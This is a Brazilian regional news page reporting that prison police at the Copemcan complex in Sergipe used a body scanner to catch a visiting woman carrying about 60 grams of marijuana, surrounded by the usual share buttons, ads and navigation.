<div class="atbs-ceris-block atbs-ceris-block-48201 atbs-ceris-block--fullwidth single-entry element-scroll-percent   single-infinity-inner" data-url-to-load="https://www.soudesergipe.com.br/iml-recolheu-seis-corpos-no-feriado/" data-post-title-to-load="IML recolheu seis corpos no feriado" data-postid="48201" data-wcount="159" data-next-wcount="167">
<div class="container">
<div class="row">
<div class="atbs-ceris-main-col " role="main">
<article class="post-48201 post type-post status-publish format-standard has-post-thumbnail hentry category-estado post--single">
<div class="single-content">
<header class="single-header single-header--body">
<div class="single-header--body-wrap">
<div class="media">
<div class="media-body">
<a class="cat-86 entry-cat post__cat post__cat--bg cat-theme-bg" href="https://www.soudesergipe.com.br/estado/">Estado</a> <h1 class="entry-title post__title">Polícia Penal flagra mulher tentando entrar com drogas no Copemcan</h1>
<div class="entry-meta">
<time class="time published" datetime="2022-04-22T10:04:55+00:00" title="abril 22, 2022 at 10:04 am"><i class="mdicon mdicon-schedule"></i>22 de abril de 2022</time><span class="post-view-counter"><i class="mdicon mdicon-visibility"></i>208 views</span><span class="post-comment-counter"><a title="0 Comments" href="https://www.soudesergipe.com.br/policia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan/"><i class="mdicon mdicon-chat_bubble_outline"></i>0</a></span> </div>
</div>
</div>
</div>
</header>
<div class="single-body entry-content typography-copy">
<div class="single-body--sharing-bar js-sticky-sidebar"><div class="single-content-left js-sticky-sidebar"><div class="social-share"><span class="social-share-label">Compartilhe</span><ul class="social-list social-list--md"><li class="facebook-share"><a class="sharing-btn sharing-btn-primary facebook-btn" data-placement="top" title="Share on Facebook" onClick="window.open('http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Facebook','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><div class="share-item__icon"><svg fill="#888" preserveAspectRatio="xMidYMid meet" height="1.3em" width="1.3em" viewBox="0 0 40 40">
<g>
<path d="m21.7 16.7h5v5h-5v11.6h-5v-11.6h-5v-5h5v-2.1c0-2 0.6-4.5 1.8-5.9 1.3-1.3 2.8-2 4.7-2h3.5v5h-3.5c-0.9 0-1.5 0.6-1.5 1.5v3.5z"></path>
</g>
</svg></div></a></li><li class="twitter-share"><a class="sharing-btn sharing-btn-primary twitter-btn" data-placement="top" title="Share on Twitter" onClick="window.open('http://twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan','Twitter share','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan"><div class="share-item__icon"><svg fill="#888" preserveAspectRatio="xMidYMid meet" height="1.3em" width="1.3em" viewBox="0 0 40 40">
<g>
<path d="m31.5 11.7c1.3-0.8 2.2-2 2.7-3.4-1.4 0.7-2.7 1.2-4 1.4-1.1-1.2-2.6-1.9-4.4-1.9-1.7 0-3.2 0.6-4.4 1.8-1.2 1.2-1.8 2.7-1.8 4.4 0 0.5 0.1 0.9 0.2 1.3-5.1-0.1-9.4-2.3-12.7-6.4-0.6 1-0.9 2.1-0.9 3.1 0 2.2 1 3.9 2.8 5.2-1.1-0.1-2-0.4-2.8-0.8 0 1.5 0.5 2.8 1.4 4 0.9 1.1 2.1 1.8 3.5 2.1-0.5 0.1-1 0.2-1.6 0.2-0.5 0-0.9 0-1.1-0.1 0.4 1.2 1.1 2.3 2.1 3 1.1 0.8 2.3 1.2 3.6 1.3-2.2 1.7-4.7 2.6-7.6 2.6-0.7 0-1.2 0-1.5-0.1 2.8 1.9 6 2.8 9.5 2.8 3.5 0 6.7-0.9 9.4-2.7 2.8-1.8 4.8-4.1 6.1-6.7 1.3-2.6 1.9-5.3 1.9-8.1v-0.8c1.3-0.9 2.3-2 3.1-3.2-1.1 0.5-2.3 0.8-3.5 1z"></path>
</g>
</svg></div></a></li><li class="pinterest-share"><a class="sharing-btn pinterest-btn" data-placement="top" title="Share on Pinterest" href="javascript:void((function()%7Bvar%20e=document.createElement(&apos;script&apos;);e.setAttribute(&apos;type&apos;,&apos;text/javascript&apos;);e.setAttribute(&apos;charset&apos;,&apos;UTF-8&apos;);e.setAttribute(&apos;src&apos;,&apos;//assets.pinterest.com/js/pinmarklet.js?r=&apos;+Math.random()*99999999);document.body.appendChild(e)%7D)());"><div class="share-item__icon"><svg fill="#888" preserveAspectRatio="xMidYMid meet" height="1.3em" width="1.3em" viewBox="0 0 40 40">
<g>
<path d="m37.3 20q0 4.7-2.3 8.6t-6.3 6.2-8.6 2.3q-2.4 0-4.8-0.7 1.3-2 1.7-3.6 0.2-0.8 1.2-4.7 0.5 0.8 1.7 1.5t2.5 0.6q2.7 0 4.8-1.5t3.3-4.2 1.2-6.1q0-2.5-1.4-4.7t-3.8-3.7-5.7-1.4q-2.4 0-4.4 0.7t-3.4 1.7-2.5 2.4-1.5 2.9-0.4 3q0 2.4 0.8 4.1t2.7 2.5q0.6 0.3 0.8-0.5 0.1-0.1 0.2-0.6t0.2-0.7q0.1-0.5-0.3-1-1.1-1.3-1.1-3.3 0-3.4 2.3-5.8t6.1-2.5q3.4 0 5.3 1.9t1.9 4.7q0 3.8-1.6 6.5t-3.9 2.6q-1.3 0-2.2-0.9t-0.5-2.4q0.2-0.8 0.6-2.1t0.7-2.3 0.2-1.6q0-1.2-0.6-1.9t-1.7-0.7q-1.4 0-2.3 1.2t-1 3.2q0 1.6 0.6 2.7l-2.2 9.4q-0.4 1.5-0.3 3.9-4.6-2-7.5-6.3t-2.8-9.4q0-4.7 2.3-8.6t6.2-6.2 8.6-2.3 8.6 2.3 6.3 6.2 2.3 8.6z"></path>
</g>
</svg></div></a></li><li class="linkedin-share"><a class="sharing-btn linkedin-btn" data-placement="top" title="Share on Linkedin" onClick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Linkedin','width=863,height=500,left='+(screen.availWidth/2-431)+',top='+(screen.availHeight/2-250)+''); return false;" href="//www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><div class="share-item__icon"><svg fill="#888" preserveAspectRatio="xMidYMid meet" height="1.3em" width="1.3em" viewBox="0 0 40 40">
<g>
<path d="m13.3 31.7h-5v-16.7h5v16.7z m18.4 0h-5v-8.9c0-2.4-0.9-3.5-2.5-3.5-1.3 0-2.1 0.6-2.5 1.9v10.5h-5s0-15 0-16.7h3.9l0.3 3.3h0.1c1-1.6 2.7-2.8 4.9-2.8 1.7 0 3.1 0.5 4.2 1.7 1 1.2 1.6 2.8 1.6 5.1v9.4z m-18.3-20.9c0 1.4-1.1 2.5-2.6 2.5s-2.5-1.1-2.5-2.5 1.1-2.5 2.5-2.5 2.6 1.2 2.6 2.5z"></path>
</g>
</svg></div></a></li></ul></div></div></div> <div class="single-body--content">
<div class="entry-thumb single-entry-thumb"><img width="768" height="400" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/04/WhatsApp-Image-2022-04-22-at-09.44.10-768x729-1-768x400.jpeg" class="attachment-ceris-m-2_1 size-ceris-m-2_1 wp-post-image" alt="" /> <div class="ceris-entry-meta-with-share-wrap">
<div class="entry-meta ceris-entry-meta-with-share">
<span class="entry-author entry-author--with-ava">
<img alt='Maycon Fernandes' src='https://secure.gravatar.com/avatar/6f85e83e56250a15049dfaffd16e107f?s=50&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/6f85e83e56250a15049dfaffd16e107f?s=100&#038;d=mm&#038;r=g 2x' class='avatar avatar-50 photo entry-author__avatar' height='50' width='50' loading='lazy' />Por <a class="entry-author__name" title="Posts by Maycon Fernandes" rel="author" href="https://www.soudesergipe.com.br/author/maycon/">Maycon Fernandes</a> </span>
<div class="ceris-share-socials">
<span class="title-socials">Compartilhe</span>
<ul class="list-unstyled list-horizontal">
<li><a class="sharing-btn sharing-btn-primary facebook-btn" data-toggle="tooltip" data-placement="top" title="Share on Facebook" onClick="window.open('http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Facebook','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><i class="mdicon mdicon-facebook"></i></a></li><li><a class="sharing-btn sharing-btn-primary twitter-btn" data-toggle="tooltip" data-placement="top" title="Share on Twitter" onClick="window.open('http://twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan','Twitter share','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan"><i class="mdicon mdicon-twitter"></i></a></li><li><a class="sharing-btn pinterest-btn" data-toggle="tooltip" data-placement="top" title="Share on Pinterest" href="javascript:void((function()%7Bvar%20e=document.createElement(&apos;script&apos;);e.setAttribute(&apos;type&apos;,&apos;text/javascript&apos;);e.setAttribute(&apos;charset&apos;,&apos;UTF-8&apos;);e.setAttribute(&apos;src&apos;,&apos;//assets.pinterest.com/js/pinmarklet.js?r=&apos;+Math.random()*99999999);document.body.appendChild(e)%7D)());"><i class="mdicon mdicon-pinterest-p"></i></a></li><li><a class="sharing-btn linkedin-btn" data-toggle="tooltip" data-placement="top" title="Share on Linkedin" onClick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Linkedin','width=863,height=500,left='+(screen.availWidth/2-431)+',top='+(screen.availHeight/2-250)+''); return false;" href="//www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><i class="mdicon mdicon-linkedin"></i></a></li> </ul>
</div>
</div>
</div>
</div> <div class="single-content__wrap"><div class="soude-antes-do-conteudo" style="margin-left: auto; margin-right: auto; text-align: center; margin-top: 10px; margin-bottom: 10px; " id="soude-571172499"><a href="https://www.hinode.com.br/maquiagem?id_consultor=01631378" target="_blank"><img loading="lazy" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/03/linha-maquiagem-hinode-itabaiana.jpg" alt="" width="728" height="90" style="display: inline-block;" /></a></div><p>Policiais penais do Complexo Penitenciário Dr. Manoel Carvalho Neto (Copemcan), com o uso do equipamento de revista corporal sem contato, o bodyscan, identificaram uma mulher que tentava entrar com entorpecente na unidade prisional. O caso ocorreu nessa quinta-feira (21).</p>
<p>De acordo com as equipes, a mulher é visitante regular como irmã de um interno da unidade prisional. Ela estava com, aproximadamente, 60 gramas de maconha dentro do corpo. Os policiais penais a flagraram com o bodyscan durante a revista</p><div class="soude-conteudo_2" style="margin-left: auto; margin-right: auto; text-align: center; margin-top: 10px; margin-bottom: 10px; clear: both; " id="soude-112678766"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block;" data-ad-client="ca-pub-9689965341835139" data-ad-slot="4355654151" data-ad-format="auto"></ins>
<script> 
(adsbygoogle = window.adsbygoogle || []).push({}); 
</script>
</div>
<p>Primeiramente, ela foi encaminhada ao Instituto Médico Legal (IML) onde foi retirada a droga e depois encaminhada à Central de Flagrantes, onde a ocorrência foi registrada.</p>
</div>
<div class="ceris-mobile-share-socials">
<h3>Compartilhar</h3>
<ul class="list-unstyled list-horizontal">
<li><a class="sharing-btn sharing-btn-primary facebook-btn" data-toggle="tooltip" data-placement="top" title="Share on Facebook" onClick="window.open('http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Facebook','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><i class="mdicon mdicon-facebook"></i></a></li><li><a class="sharing-btn sharing-btn-primary twitter-btn" data-toggle="tooltip" data-placement="top" title="Share on Twitter" onClick="window.open('http://twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan','Twitter share','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="//twitter.com/share?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&amp;text=Polícia%20Penal%20flagra%20mulher%20tentando%20entrar%20com%20drogas%20no%20Copemcan"><i class="mdicon mdicon-twitter"></i></a></li><li><a class="sharing-btn pinterest-btn" data-toggle="tooltip" data-placement="top" title="Share on Pinterest" href="javascript:void((function()%7Bvar%20e=document.createElement(&apos;script&apos;);e.setAttribute(&apos;type&apos;,&apos;text/javascript&apos;);e.setAttribute(&apos;charset&apos;,&apos;UTF-8&apos;);e.setAttribute(&apos;src&apos;,&apos;//assets.pinterest.com/js/pinmarklet.js?r=&apos;+Math.random()*99999999);document.body.appendChild(e)%7D)());"><i class="mdicon mdicon-pinterest-p"></i></a></li><li><a class="sharing-btn linkedin-btn" data-toggle="tooltip" data-placement="top" title="Share on Linkedin" onClick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F','Linkedin','width=863,height=500,left='+(screen.availWidth/2-431)+',top='+(screen.availHeight/2-250)+''); return false;" href="//www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F"><i class="mdicon mdicon-linkedin"></i></a></li> </ul>
</div>
<footer class="single-footer entry-footer">
<div class="entry-interaction entry-interaction--horizontal">
<div class="entry-interaction__left">
<div class="entry-tags">
<ul>
</ul>
</div>
</div>
<div class="entry-interaction__right">
 <a href="#comments" class="comments-count" data-toggle="tooltip" data-placement="top" title="0 Comments"><i class="mdicon mdicon-comment-o"></i><span>0</span></a><a href="#views" class="view-count" data-toggle="tooltip" data-placement="top" title="208 Views"><i class="mdicon mdicon-visibility"></i><span>208</span></a> </div>
</div>
</footer> </div>
</div>
</div>
</article>
<div class="navigation-author__wrap">
</div>
<div class="related-posts single-entry-section the-heading-size-xxs"><div class="block-heading block-heading--style-7"><h4 class="block-heading__title">Você pode gostar</h4></div><div class="posts-listing-grid-small atbs-ceris-post--listing-list-a-update"><div class="post-list posts-list"><div class="list-item"> <article class="post post--horizontal  post--horizontal-reverse posts-has-smaller-post-cat post--horizontal-middle post--horizontal-120 remove-margin-bottom-lastchild post--horizontal-cat-no-line" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/iml-recolheu-seis-corpos-no-feriado/"><img width="400" height="240" src="https://www.soudesergipe.com.br/wp-content/uploads/2020/01/iml_lagarto_homicidio_vila_foto_grupo_whatsapp_noticias_alerta.jpg" class="attachment-ceris-xs-1_1 size-ceris-xs-1_1 wp-post-image" alt="" loading="lazy" /></a> 
</div>
<div class="post__text ">
<h3 class="post__title typescale-2 custom-typescale-2--xxs"><a href="https://www.soudesergipe.com.br/iml-recolheu-seis-corpos-no-feriado/">IML recolheu seis corpos no feriado</a></h3>
<div class="post__meta">
<time class="time published" datetime="2022-04-22T09:37:05+00:00" title="abril 22, 2022 at 9:37 am"><i class="mdicon mdicon-schedule"></i>22 de abril de 2022</time> </div>
</div>
</article>
</div><div class="list-item"> <article class="post post--horizontal  post--horizontal-reverse posts-has-smaller-post-cat post--horizontal-middle post--horizontal-120 remove-margin-bottom-lastchild post--horizontal-cat-no-line" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/nove-corpos-deram-entrada-no-iml-nas-ultimas-24h-3/"><img width="400" height="300" src="https://www.soudesergipe.com.br/wp-content/uploads/2021/11/WhatsApp-Image-2021-11-26-at-09.55.36.jpeg" class="attachment-ceris-xs-1_1 size-ceris-xs-1_1 wp-post-image" alt="" loading="lazy" /></a> 
</div>
<div class="post__text ">
<h3 class="post__title typescale-2 custom-typescale-2--xxs"><a href="https://www.soudesergipe.com.br/nove-corpos-deram-entrada-no-iml-nas-ultimas-24h-3/">Nove corpos deram entrada no IML nas últimas 24h</a></h3>
<div class="post__meta">
<time class="time published" datetime="2022-04-21T16:54:14+00:00" title="abril 21, 2022 at 4:54 pm"><i class="mdicon mdicon-schedule"></i>21 de abril de 2022</time> </div>
</div>
</article>
</div></div></div></div> <div class="comments-section single-entry-section">
<div id="comments" class="comments-area  the-heading-size-xxs">
<p class="nocomments">Comments are closed.</p>
</div>
</div> 
</div>
<div class="atbs-ceris-sub-col sidebar js-sticky-sidebar" role="complementary">
<div id="custom_html-5" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139" crossorigin="anonymous"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9689965341835139" data-ad-slot="3322191973" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="bk_widget_posts_list-2" class="widget atbs-ceris-widget"><div class="atbs-ceris-widget-indexed-posts-a"><div class="widget__title block-heading block-heading--line"><h4 class="widget__title-text">As mais lidas</h4></div><ol class="posts-list list-space-md list-unstyled"><li> <article class="post post--horizontal post--horizontal-xxs" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/meu-sentimento-e-que-a-justica-seja-feita-diz-pai-sobre-morte-do-filho-em-uma-quadra-de-socorro/"><img width="151" height="180" src="https://www.soudesergipe.com.br/wp-content/uploads/2017/04/samuel-carvalho-eofilho.jpg" class="attachment-ceris-xxs-1_1 size-ceris-xxs-1_1 wp-post-image" alt="" loading="lazy" /></a>  </div>
<div class="post__text ">
<h3 class="post__title typescale-0"><a href="https://www.soudesergipe.com.br/meu-sentimento-e-que-a-justica-seja-feita-diz-pai-sobre-morte-do-filho-em-uma-quadra-de-socorro/">Meu sentimento é que a justiça seja feita, diz pai sobre morte do filho em uma quadra de Socorro</a></h3>
</div>
</article>
</li><li> <article class="post post--horizontal post--horizontal-xxs" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/ao-vivo-4-cameras-em-tempo-real-em-miami/"><img width="180" height="120" src="https://www.soudesergipe.com.br/wp-content/uploads/2017/09/furacao_irma.jpg" class="attachment-ceris-xxs-1_1 size-ceris-xxs-1_1 wp-post-image" alt="" loading="lazy" /></a>  </div>
<div class="post__text ">
<h3 class="post__title typescale-0"><a href="https://www.soudesergipe.com.br/ao-vivo-4-cameras-em-tempo-real-em-miami/">Ao vivo: 4 câmeras em tempo real em Miami</a></h3>
</div>
</article>
</li><li> <article class="post post--horizontal post--horizontal-xxs" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/urgente-piora-estado-de-saude-de-paulinha-abelha-cantora-esta-em-coma/"><img width="180" height="180" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/paulinha-abelha-ok-e1645008016674-983x570-1-180x180.jpg" class="attachment-ceris-xxs-1_1 size-ceris-xxs-1_1 wp-post-image" alt="" loading="lazy" /></a>  </div>
<div class="post__text ">
<h3 class="post__title typescale-0"><a href="https://www.soudesergipe.com.br/urgente-piora-estado-de-saude-de-paulinha-abelha-cantora-esta-em-coma/">URGENTE: Piora estado de saúde de Paulinha Abelha, cantora está em coma</a></h3>
</div>
</article>
</li><li> <article class="post post--horizontal post--horizontal-xxs" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/jovem-youtuber-e-assassinado-na-frente-da-mae-em-carira/"><img width="180" height="120" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/01/24992.max-2220x1000-1.jpg" class="attachment-ceris-xxs-1_1 size-ceris-xxs-1_1 wp-post-image" alt="" loading="lazy" /></a>  </div>
<div class="post__text ">
<h3 class="post__title typescale-0"><a href="https://www.soudesergipe.com.br/jovem-youtuber-e-assassinado-na-frente-da-mae-em-carira/">Jovem youtuber é assassinado na frente da mãe em Carira</a></h3>
</div>
</article>
</li><li> <article class="post post--horizontal post--horizontal-xxs" data-dark-mode="true">
<div class="post__thumb ">
<a href="https://www.soudesergipe.com.br/homem-cai-de-cima-de-caminhao-durante-alvorada/"><img width="180" height="92" src="https://www.soudesergipe.com.br/wp-content/uploads/2017/08/jovem-cai-caminhao-alvorada-brito-140817.jpg" class="attachment-ceris-xxs-1_1 size-ceris-xxs-1_1 wp-post-image" alt="" loading="lazy" /></a>  </div>
<div class="post__text ">
<h3 class="post__title typescale-0"><a href="https://www.soudesergipe.com.br/homem-cai-de-cima-de-caminhao-durante-alvorada/">Homem cai de cima de caminhão durante alvorada</a></h3>
</div>
</article>
</li></ol> </div></div> </div>
</div>
</div>
</div>
</div>
<div class="infinity-single-trigger"></div>
</div><div class="single-next-article-info-popup atbs-force-hidden js-sticky-article-info">
<span class="next-article-popup-heading">Próximo Post:</span>
<h3 class="post__title typescale-1"></h3>
<div class="post__meta">
<time class="time published" datetime="2022-04-22T10:04:55+00:00" title="abril 22, 2022 at 10:04 am"><i class="mdicon mdicon-schedule"></i>22 de abril de 2022</time> <div class="ceris-article-wpm--wrap">
<span class="min-read-icon">
<svg class="svgIcon-use" width="15" height="15"><path d="M7.438 2.324c.034-.099.09-.099.123 0l1.2 3.53a.29.29 0 0 0 .26.19h3.884c.11 0 .127.049.038.111L9.8 8.327a.271.271 0 0 0-.099.291l1.2 3.53c.034.1-.011.131-.098.069l-3.142-2.18a.303.303 0 0 0-.32 0l-3.145 2.182c-.087.06-.132.03-.099-.068l1.2-3.53a.271.271 0 0 0-.098-.292L2.056 6.146c-.087-.06-.071-.112.038-.112h3.884a.29.29 0 0 0 .26-.19l1.2-3.52z"></path></svg>
</span>
<span class="ceris-article-wpm"></span>min de leitura </div>
</div>
<span class="single-next-article-info-popup--close">
<svg viewBox="0 0 15.642 15.642" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 15.642 15.642">
<path fill="#444444" fill-rule="evenodd" d="M8.882,7.821l6.541-6.541c0.293-0.293,0.293-0.768,0-1.061  c-0.293-0.293-0.768-0.293-1.061,0L7.821,6.76L1.28,0.22c-0.293-0.293-0.768-0.293-1.061,0c-0.293,0.293-0.293,0.768,0,1.061  l6.541,6.541L0.22,14.362c-0.293,0.293-0.293,0.768,0,1.061c0.147,0.146,0.338,0.22,0.53,0.22s0.384-0.073,0.53-0.22l6.541-6.541  l6.541,6.541c0.147,0.146,0.338,0.22,0.53,0.22c0.192,0,0.384-0.073,0.53-0.22c0.293-0.293,0.293-0.768,0-1.061L8.882,7.821z"></path>
</svg>
</span>
</div>
<footer class="site-footer footer-default ceris-footer ">
<div class="site-footer__section">
<div class="container">
<div class="site-footer__section-inner hidden-lg hidden-md text-center">
<div class="site-logo atbs-ceris-logo">
<a href="https://www.soudesergipe.com.br">

<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" width="160px" />

<img class="ceris-img-logo" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" width="160px" />


</a>
</div>
</div>
<div class="site-footer__section-inner text-center ">
<div class="site-logo hidden-sm hidden-xs text-left flex-1 atbs-ceris-logo">
<a href="https://www.soudesergipe.com.br">

<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" width="160px" />

<img class="ceris-img-logo" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" width="160px" />


</a>
</div>
<nav class="footer-menu text-center flex-2">
<div class="menu-rodape-container"><ul id="menu-rodape" class="navigation navigation--footer navigation--inline"><li id="menu-item-43866" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43866"><a href="https://www.soudesergipe.com.br/contato/">Contato</a></li>
<li id="menu-item-43870" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-43870"><a href="https://www.soudesergipe.com.br/politica-de-privacidade/">Política de Privacidade</a></li>
<li id="menu-item-43867" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43867"><a href="https://www.soudesergipe.com.br/politica-de-etica/">Política de Ética</a></li>
<li id="menu-item-43868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43868"><a href="https://www.soudesergipe.com.br/politica-de-verificacao-de-fatos/">Política de Verificação de Fatos</a></li>
</ul></div> </nav>
<ul class="social-list social-list--lg list-center hidden-sm hidden-xs text-right flex-1">
<li><a href="https://www.facebook.com/SoudeSergipe/" target="_blank"><i class="mdicon mdicon-facebook"></i></a></li><li><a href="https://instagram.com/portalsoudesergipe" target="_blank"><i class="mdicon mdicon-instagram"></i></a></li> </ul>
</div>
<div class="site-footer__section-inner hidden-lg hidden-md">
<ul class="social-list social-list--lg list-center">
<li><a href="https://www.facebook.com/SoudeSergipe/" target="_blank"><i class="mdicon mdicon-facebook"></i></a></li><li><a href="https://instagram.com/portalsoudesergipe" target="_blank"><i class="mdicon mdicon-instagram"></i></a></li> </ul>
</div>
</div>
</div>
</footer>
<div id="atbs-ceris-offcanvas-primary" class="menu-wrap atbs-ceris-offcanvas animation_0_row js-atbs-ceris-offcanvas"> 
<div class="atbs-ceris-offcanvas--inner js-perfect-scrollbar">
<div class="atbs-ceris-offcanvas__section atbs-ceris-offcanvas__title border-right">
<h2 class="site-logo atbs-ceris-logo not-exist-img-logo">
<a href="https://www.soudesergipe.com.br">

<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" />



</a>
</h2>
<ul class="social-list list-horizontal">
<li><a href="https://www.facebook.com/SoudeSergipe/" target="_blank"><i class="mdicon mdicon-facebook"></i></a></li><li><a href="https://instagram.com/portalsoudesergipe" target="_blank"><i class="mdicon mdicon-instagram"></i></a></li> </ul>
<a href="#atbs-ceris-offcanvas-primary" class="close-button atbs-ceris-offcanvas-close js-atbs-ceris-offcanvas-close" aria-label="Close">
<div class="atbs-ceris-offcanvas-close--wrap">
<span aria-hidden="true">&#10005;</span>
<span class="label-icon">Close</span>
</div>
</a>
</div>
<div class="atbs-ceris-offcanvas__section atbs-ceris-offcanvas__section-navigation border-right">
<div class="atbs-ceris-offcanvas__section-navigation--wrap">
<div id="offcanvas-menu-desktop" class="menu-home-container"><ul id="menu-home-1" class="navigation navigation--offcanvas"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47062"><a href="https://www.soudesergipe.com.br/ultimas-noticias/">Últimas Notícias</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20963 menu-item-cat-17"><a href="https://www.soudesergipe.com.br/brasil/">Brasil</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47071 menu-item-cat-86"><a href="https://www.soudesergipe.com.br/estado/">Estado</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48180 menu-item-cat-17309"><a href="https://www.soudesergipe.com.br/editais/">Editais Oficiais</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18928 menu-item-cat-2"><a href="https://www.soudesergipe.com.br/cidades/">Cidades</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47065 menu-item-cat-12"><a href="https://www.soudesergipe.com.br/cidades/aracaju/">Aracaju</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47073 menu-item-cat-59"><a href="https://www.soudesergipe.com.br/cidades/caninde/">Canindé</a></li>
